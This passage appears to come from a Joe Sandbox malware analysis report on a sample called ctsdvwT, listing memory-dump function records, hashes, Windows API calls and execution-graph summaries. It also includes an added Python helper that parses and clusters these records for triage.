                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,05C6D875), ref: 05C6D8FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID: s,s#
                                        • API String ID: 2492992576-3488363693
                                        • Opcode ID: e7ce09e90eba02b82b844c980fd63cbc78ab5d4b476c8fad7b6562c28a970253
                                        • Instruction ID: 2508ba1599b62ab4a9108526f4aa4f70e8d84182b29c08b9b0df40420795d047
                                        • Opcode Fuzzy Hash: e7ce09e90eba02b82b844c980fd63cbc78ab5d4b476c8fad7b6562c28a970253
                                        • Instruction Fuzzy Hash: 621142B59003498FDB10CF9AD484BDEBBF4EB08314F20881AD419A7210C375A644CFA0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: s,s#$s,s#
                                        • API String ID: 0-128926716
                                        • Opcode ID: 6ffe37b8f08c743331fc3de59983b69283a9bf573476734d964e9f1fc4f92ced
                                        • Instruction ID: d325e7ec2e1cf5f60ef9939e88eba2648cc881766bf80c91c669853382c1d46a
                                        • Opcode Fuzzy Hash: 6ffe37b8f08c743331fc3de59983b69283a9bf573476734d964e9f1fc4f92ced
                                        • Instruction Fuzzy Hash: 7DA16A71E00209CFEF50DFA9C88179EBBF2AF88714F149129DA14E7794EB749885CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: s,s#$s,s#
                                        • API String ID: 0-128926716
                                        • Opcode ID: c3183662aaf115a9cf124cbbd9ce230448af107f9eaaf45c62490285099c031b
                                        • Instruction ID: 75c8c66211183229821c53448dc8767d5111ae921512949fecdc60cbf30e872a
                                        • Opcode Fuzzy Hash: c3183662aaf115a9cf124cbbd9ce230448af107f9eaaf45c62490285099c031b
                                        • Instruction Fuzzy Hash: 62915970E00249DFDF50DFA8C9817AEBBF2AF88314F148129E614E7794EB749885CB95
                                        Strings
                                        Memory Dump Source
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99270673397b7adaeadc5124c6b95945f4ec45da63d672e8aea496ea4952f3e0
                                        • Instruction ID: a60e1e39861268844344cdc82a308c4b5dbc5afb2433f1a8ccd8ccb8bf1d8941
                                        • Opcode Fuzzy Hash: 99270673397b7adaeadc5124c6b95945f4ec45da63d672e8aea496ea4952f3e0
                                        • Instruction Fuzzy Hash: 71211934700245CFDB54DB78C558BAE77F1AB8D345B1004A8D606EB7A0DB369D01CB91
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ea248946b960927b0938b60fea28252d2289c630064eeb1a19ca9717a9046fe
                                        • Instruction ID: 792ebb77ef774b236082af4c947ef3da594ff5c61a01e7de4780514b5762b891
                                        • Opcode Fuzzy Hash: 9ea248946b960927b0938b60fea28252d2289c630064eeb1a19ca9717a9046fe
                                        • Instruction Fuzzy Hash: CA11A734B002058FEF946B79D9547393355FB85214F20897AD617CF34AEB61CC818BC1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: db93bf6ae5075d753aa227a74c75a09db906900473ffa5f6857ccd323e705579
                                        • Instruction ID: 690067936b5844ef8f0789eddfd1fde63b2ae36d09f91baa11ad0d6543cf76f7
                                        • Opcode Fuzzy Hash: db93bf6ae5075d753aa227a74c75a09db906900473ffa5f6857ccd323e705579
                                        • Instruction Fuzzy Hash: 0D11E034B042058FEFA567B5995036A3765EB86210F20896AD612CF38BEB64CC818BC1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1933011760.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_a9d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e3fb5124520d44414316b3f2ece7279f92706d2f0ba3976cf9b2c6f8775a3ae3
                                        • Instruction ID: 13e11403a9ba28f0942a04103987308969c9b85ced2c29e459defceea487b33d
                                        • Opcode Fuzzy Hash: e3fb5124520d44414316b3f2ece7279f92706d2f0ba3976cf9b2c6f8775a3ae3
                                        • Instruction Fuzzy Hash: 1121C6755093808FDB02CF20D590715BFB1FB45314F28C5EAD8498B697C33AD84ACB62
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac07d9d9fa34c69c72396bdb1879d159b860ac3630a656014afe82e503fee39e
                                        • Instruction ID: 7295f6df62e718f9c30618df33bdd148034249733754de1d67e2526694f8a47d
                                        • Opcode Fuzzy Hash: ac07d9d9fa34c69c72396bdb1879d159b860ac3630a656014afe82e503fee39e
                                        • Instruction Fuzzy Hash: 95018071A01215DFCFA1EFB984542AD7BF6EF49250B5104BADA0AE7301E735C8418FA5
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d9bfe306068dda23430115133cba776663869fd9cdd5b4083df6e30babad1e39
                                        • Instruction ID: 28c2dacf72fe5ce538e83e824056fbabe725de537c50b13511858c2e0d145f23
                                        • Opcode Fuzzy Hash: d9bfe306068dda23430115133cba776663869fd9cdd5b4083df6e30babad1e39
                                        • Instruction Fuzzy Hash: 4C019E31A002048BDF04EF95D98478AB766FFC5711F548264D9086B29AEBB0E905CBA1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91a6ffc2ecd46314af80b1eb338487d27d7073178cb79737c60d3dec53d8ca62
                                        • Instruction ID: 60e73bf379c1d0703a7c4e198042beecd87db80484736bbe73dbc7e791f39341
                                        • Opcode Fuzzy Hash: 91a6ffc2ecd46314af80b1eb338487d27d7073178cb79737c60d3dec53d8ca62
                                        • Instruction Fuzzy Hash: 79014F34A0120AEFDB05FBB4FD9559D7BB2FB85700F1085AEC0089B295DB711E098B82
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b1d09f7b7b46a6c7653f598fdb09eb8b846f63391c618d2295b1050b6e18718
                                        • Instruction ID: 7161b64984a65b6d039ad9c3b59017fb26e3cb3fd3ea6dbd07944c34ed567203
                                        • Opcode Fuzzy Hash: 0b1d09f7b7b46a6c7653f598fdb09eb8b846f63391c618d2295b1050b6e18718
                                        • Instruction Fuzzy Hash: 57F02BB7A04150CFDF52CBB494501ACBBB1EF8629175950DBDA0BDB302D334D402CB51
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3510d63b5f44a7a644800277b02b0277e4bcec7f4201fd28d6c0121796123bd
                                        • Instruction ID: 36dd3673229c0c3a0f139a1f75287dae6212db51eedbb4e4a55b8e4bcc09e45c
                                        • Opcode Fuzzy Hash: f3510d63b5f44a7a644800277b02b0277e4bcec7f4201fd28d6c0121796123bd
                                        • Instruction Fuzzy Hash: 0FF04F34A0020AEFDB05FBB8FD8559D77B2FB84700F5086A9C0089B255EF712F098B81

                                        Execution Graph

                                        Execution Coverage:7.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:38
                                        Total number of Limit Nodes:6
                                        execution_graph (rendered as an interactive node/edge diagram in the original report; the flattened node list is summarized here). Entry points and the API calls reached from them, in call order:
                                        • 100d3e0: DuplicateHandle -> 100d476
                                        • 100acf0 -> 100ade7 -> 100adf9 -> 100b020: GetModuleHandleW -> 100b04d -> 100acff; a second path 100acf0 -> 100add9 -> 100ade3 reaches the same GetModuleHandleW call
                                        • 100d198 -> 100d1de: GetCurrentProcess -> 100d230: GetCurrentThread -> 100d26d: GetCurrentProcess -> 100d2a3 -> 100d2cb: GetCurrentThreadId -> 100d2fc
                                        • 1004668 -> 100467a -> 1004778 -> 1004783 -> 1004888 / 1004887 -> 10048af -> 10044d4: CreateActCtxA (one path continues to 1005918: CreateActCtxA -> 10059db)
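Added triage example (not part of the Joe Sandbox report or its tooling): the function records on this page share one text layout, an optional APIs list, a Memory Dump Source line, Similarity fields and an Instruction Fuzzy Hash, and the Execution Graph summary above reports Execution Coverage 7.5% with Dynamic/Decrypted Code Coverage 100%. The Python below parses that layout into records, groups functions by dumped region (process index and base, with the "based on PE" flag), finds functions by the imports they resolve, and clusters near-identical functions, such as the two GetCurrentProcess/GetCurrentThread copies in process 10, by a nibble-wise Hamming distance over the fuzzy hash. The sample text is constructed from values that appear on this page; the distance metric, its threshold of 8 nibbles, and the reading of the leading .sdmp name field as the process index are this example's own assumptions, not documented Joe Sandbox behaviour.

```python
"""Triage helper for the per-function records of a Joe Sandbox report (the
"APIs / Memory Dump Source / Similarity / Instruction Fuzzy Hash" blocks).
Added example, not Joe Sandbox tooling; the nibble distance is its own heuristic."""
import re
from collections import defaultdict

API_RE = re.compile(r"^•\s*(?P<api>\w+)\.(?P<module>\w+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

# Constructed sample in the report's own layout: values copied from records on
# this page, trimmed to the lines the parser needs.
SAMPLE = """\
Control-flow Graph
APIs
• GetCurrentProcess.KERNEL32 ref: 0100D216
• GetCurrentThreadId.KERNEL32 ref: 0100D2E9
Memory Dump Source
• Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
Similarity
• API ID: Current$ProcessThread
• Instruction Fuzzy Hash: A15197B090074A8FEB09DFAAD548B9EBBF1FF88314F208459D459A7390D734A944CF66
APIs
• GetCurrentProcess.KERNEL32 ref: 0100D216
• GetCurrentThreadId.KERNEL32 ref: 0100D2E9
Memory Dump Source
• Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
Similarity
• API ID: Current$ProcessThread
• Instruction Fuzzy Hash: E15187B090074ACFEB05DFAAD548B9EBBF1FF88314F208459E459A7290D734A944CF65
Memory Dump Source
• Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
Similarity
• API ID:
• Instruction Fuzzy Hash: 57213030B00215DFDFA4EB78C5547AE77F1AB8A384F1004A9C609EB3A4DB369D41CB95
"""


def parse_records(text):
    """One dict per function. A record starts at "APIs" (or at "Memory Dump
    Source" when no import was resolved) and ends at its Instruction Fuzzy Hash."""
    records, cur, in_apis = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur, in_apis = {"apis": [], "source": None, "fields": {}}, True
        elif line == "Memory Dump Source":
            cur, in_apis = cur or {"apis": [], "source": None, "fields": {}}, False
        elif cur is None or not line:
            continue  # graph dumps, legends, anything outside a record
        elif in_apis:
            if (m := API_RE.match(line)):
                cur["apis"].append((m["api"], m["module"], int(m["ref"], 16)))
        elif (m := SRC_RE.search(line)):
            # leading dotted field of the .sdmp name = analysis process index
            # (assumption; 0000000A pairs with hcaresult_10_... on this page)
            cur["source"] = {"file": m["file"], "process": int(m["file"].split(".")[0], 16),
                             "offset": int(m["offset"], 16), "based_on_pe": m["pe"] == "true"}
        elif (m := FIELD_RE.match(line)):
            key = m["key"].strip()
            cur["fields"][key] = m["val"].strip()
            if key == "Instruction Fuzzy Hash":  # last line of every record
                records.append(cur)
                cur = None
    return records


def summarize_regions(records):
    """Function count and resolved imports per (process, dump base).
    'based on PE: false' means the dump was not mapped to a PE image: unpacked code."""
    regions = defaultdict(lambda: {"functions": 0, "apis": set(), "based_on_pe": None})
    for r in records:
        if r["source"] is None:
            continue
        reg = regions[(r["source"]["process"], r["source"]["offset"])]
        reg["functions"] += 1
        reg["apis"].update(api for api, _, _ in r["apis"])
        reg["based_on_pe"] = r["source"]["based_on_pe"]
    return dict(regions)


def records_calling(records, *apis):
    """Functions whose resolved imports include every API named."""
    return [r for r in records if set(apis) <= {api for api, _, _ in r["apis"]}]


def fuzzy_distance(a, b):
    """Nibble-wise Hamming distance between two equal-length fuzzy hashes."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes differ in length")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))


def cluster_by_fuzzy_hash(records, max_distance=8):
    """Greedy clustering: a record joins the first cluster whose seed hash is
    within max_distance nibbles; returns lists of record indices."""
    clusters = []  # [(seed_hash, [indices])]
    for i, r in enumerate(records):
        h = r["fields"].get("Instruction Fuzzy Hash", "")
        for seed, members in clusters:
            if len(seed) == len(h) and fuzzy_distance(seed, h) <= max_distance:
                members.append(i)
                break
        else:
            clusters.append((h, [i]))
    return [members for _, members in clusters]
```

Paste the report text into SAMPLE (or pass a file's contents to parse_records) and call summarize_regions and cluster_by_fuzzy_hash on the result. A region with "based on PE: false" and many functions is where the unpacked payload lives; a cluster with more than one member marks copies of essentially the same function, so reviewing one member per cluster cuts the work.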

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 0100D216
                                        • GetCurrentThread.KERNEL32 ref: 0100D253
                                        • GetCurrentProcess.KERNEL32 ref: 0100D290
                                        • GetCurrentThreadId.KERNEL32 ref: 0100D2E9
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1000000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 44f682d165aaba6740b1217bf79b295faaa22f292361c12f9764d64b4049fbd7
                                        • Instruction ID: 19d2dcd60b74db064c22588a9c95b28f46adbf326049ea3c0464a234dfc8953e
                                        • Opcode Fuzzy Hash: 44f682d165aaba6740b1217bf79b295faaa22f292361c12f9764d64b4049fbd7
                                        • Instruction Fuzzy Hash: A15197B090074A8FEB09DFAAD548B9EBBF1FF88314F208459D459A7390D734A944CF66

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 0100D216
                                        • GetCurrentThread.KERNEL32 ref: 0100D253
                                        • GetCurrentProcess.KERNEL32 ref: 0100D290
                                        • GetCurrentThreadId.KERNEL32 ref: 0100D2E9
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1000000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 5f9a8706c425571a25ee5608d726e194afcc05c01d079400c2d35c0e455cc39a
                                        • Instruction ID: 3aef1662f04dadd1a0143e993f8d23e8014db19201c1f6ddd32a80a4de3a70da
                                        • Opcode Fuzzy Hash: 5f9a8706c425571a25ee5608d726e194afcc05c01d079400c2d35c0e455cc39a
                                        • Instruction Fuzzy Hash: E15187B090074ACFEB05DFAAD548B9EBBF1FF88314F208459E459A7290D734A944CF65

                                        Control-flow Graph

                                        Control-flow graph (interactive in the original report, with executed/not-executed colouring that is not recoverable here; the flattened block list is summarized instead): function 100add9 through 100b068. It calls into 100a16c, 100a178, 100a188, 100a198 and 100a1a8; the call site at 100ae0e is listed with three alternative targets (100b480, 100b441, 100b47f). GetModuleHandleW is called from block 100b020-100b04b, which branches to 100b04d-100b053 and 100b054-100b068.
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0100B03E
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1000000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 0910033068330b6e2edd51838f9b2d0d1baddd28dd8ea74aab8cdcf1e9dbbd41
                                        • Instruction ID: 03fb596c6b06a01403181e0fc0ea625c5674fa82efba7dab86933f8cecc5e070
                                        • Opcode Fuzzy Hash: 0910033068330b6e2edd51838f9b2d0d1baddd28dd8ea74aab8cdcf1e9dbbd41
                                        • Instruction Fuzzy Hash: 00813470A00B45CFEB65DF69D44479ABBF1BF88300F008A2DD48ADBA80D775E945CB91

                                        Control-flow Graph

                                        Control-flow graph (interactive in the original report; executed/not-executed colouring not recoverable, block list summarized here): function 10044d4 through 1005a61, 8 basic blocks. CreateActCtxA is called from the entry block 10044d4-10059d9; the graph ends in a block at 1005a61 that loops to itself.
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 010059C9
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1000000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: f57ffff350b55e989219fa36db381b55a0af61353c41826e14bae2ac2bb2a7f6
                                        • Instruction ID: 236fe0f0de95451938003362ed9540f82bf503197e3d9c5d64a1bf34df42487f
                                        • Opcode Fuzzy Hash: f57ffff350b55e989219fa36db381b55a0af61353c41826e14bae2ac2bb2a7f6
                                        • Instruction Fuzzy Hash: BF41D070C00719CFEB25DFA9C884B8EBBF5BF49704F24806AD448AB251DB756946CF90

                                        Control-flow Graph

                                        Control-flow graph (interactive in the original report; executed/not-executed colouring not recoverable, block list summarized here): function 100d3d9 through 100d49a, 3 basic blocks. DuplicateHandle is called from the entry block 100d3d9-100d474, which branches to 100d476-100d47c and 100d47d-100d49a.
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100D467
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1000000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 5a4aef543c9f1eced12439e1775cf72cd2b7d1e485c9bcd3fc7f405a28a969d1
                                        • Instruction ID: 0992a88363836871420646bfda8626f004629157b2f9a66dad2fb15c8a6766a6
                                        • Opcode Fuzzy Hash: 5a4aef543c9f1eced12439e1775cf72cd2b7d1e485c9bcd3fc7f405a28a969d1
                                        • Instruction Fuzzy Hash: 8F21E2B5900249EFDB10CFAAD484ADEFFF5EB48320F14841AE958A3350D379A945CFA5

                                        Control-flow Graph

                                        Control-flow graph (interactive in the original report; executed/not-executed colouring not recoverable, block list summarized here): same body as the 100d3d9 graph above, entered at 100d3e0; 3 basic blocks, DuplicateHandle called from the entry block 100d3e0-100d474, which branches to 100d476-100d47c and 100d47d-100d49a.
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100D467
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1000000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 933878f624d840a56d146caf7ef8a27955b1bd4d559f086edb0e87c5b19ce594
                                        • Instruction ID: 98e32dec66709d1ed8872063be58ccf55007e87528d5dad16b30d2d625c117e3
                                        • Opcode Fuzzy Hash: 933878f624d840a56d146caf7ef8a27955b1bd4d559f086edb0e87c5b19ce594
                                        • Instruction Fuzzy Hash: 8721C2B5900249EFDB10CFAAD884ADEBBF9EB48310F14841AE958A3350D375A945CFA5

                                        Control-flow Graph

                                        Control-flow graph (interactive in the original report; executed/not-executed colouring not recoverable, block list summarized here): function 100afd8 through 100b068, 5 basic blocks. GetModuleHandleW is called from block 100b020-100b04b (the same block reached in the 100add9 graph above), which branches to 100b04d-100b053 and 100b054-100b068.
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0100B03E
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947554601.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1000000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 88cb0297c2527fdc11f4494f79b0d04893fd23f987ca9cfb7610c776a58560fb
                                        • Instruction ID: 76f05c57af7631e18d552e5616f1253ac68f49ae1b4ec69a80b6ade2eee819a7
                                        • Opcode Fuzzy Hash: 88cb0297c2527fdc11f4494f79b0d04893fd23f987ca9cfb7610c776a58560fb
                                        • Instruction Fuzzy Hash: 231110B9C007498FEB20CF9AD444BDEFBF4EB88314F10841AD569A7250D379A545CFA1
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947190571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 325ebe0e8baf9d2de882f9efa8d8c72cc6a1b143bc83b2479e043a88b0852f61
                                        • Instruction ID: 940ccddac198b56c4b868a855e59825bb6f4224e969f7babb0a9a6bcaafaccf5
                                        • Opcode Fuzzy Hash: 325ebe0e8baf9d2de882f9efa8d8c72cc6a1b143bc83b2479e043a88b0852f61
                                        • Instruction Fuzzy Hash: 3C212875508340DFDB15DF50DCC0B26BBA5FB88315F20C969ED095B266C336D81ACBA2
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947190571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8da3ff7c86d6b62b8785e20461cc4bf8c14c64a3f7adceee04a511fd65ad3846
                                        • Instruction ID: 0e6d61c95363cd3b0e3025addcd044cc223276865d61e5d8be70c1d020fa8f5c
                                        • Opcode Fuzzy Hash: 8da3ff7c86d6b62b8785e20461cc4bf8c14c64a3f7adceee04a511fd65ad3846
                                        • Instruction Fuzzy Hash: 3E210371508240DFDB25DF10D9C0B26BB65FB88319F20C969EC095B256D336D85ACAA2
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947270280.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e6d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ef14ab2098ed838b7cc08f055c6f0147e8ed40d04dc968d3ae654cf17dcb42e9
                                        • Instruction ID: 86eb6cd7730aac7059ebd3006bde7fd9e131733efc2a8081eb10216a163b3831
                                        • Opcode Fuzzy Hash: ef14ab2098ed838b7cc08f055c6f0147e8ed40d04dc968d3ae654cf17dcb42e9
                                        • Instruction Fuzzy Hash: D5214971A48340DFDB00DF10EDD0B25BBA5FB84318F64C56DD8095B262C336D846CB61
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947270280.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e6d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49452895920cd75811dea75357df26cd82c56fa643bc579e7abf302bf6a6a084
                                        • Instruction ID: ec8de78e3ec148b4dd9244d358d42764a7d63642f99370869ed79e19a609ffec
                                        • Opcode Fuzzy Hash: 49452895920cd75811dea75357df26cd82c56fa643bc579e7abf302bf6a6a084
                                        • Instruction Fuzzy Hash: 3021F575A48340DFDB54DF10E980B16BB66FB84318F64C569D8495B286C337D847CA61
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947270280.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e6d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 11cf502847f2e40b397806b391ea4c13fa6846e834ea676479471661108ca964
                                        • Instruction ID: 1e974bc698d6b5d3892a7c9db28f6490087d3ea97471b8d86141c07d535f206b
                                        • Opcode Fuzzy Hash: 11cf502847f2e40b397806b391ea4c13fa6846e834ea676479471661108ca964
                                        • Instruction Fuzzy Hash: 3921537554D3C08FC712CF24D994715BF72EB46318F28C5EAD8498B6A7C33A984ACB62
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947190571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947190571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947270280.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e6d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947190571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
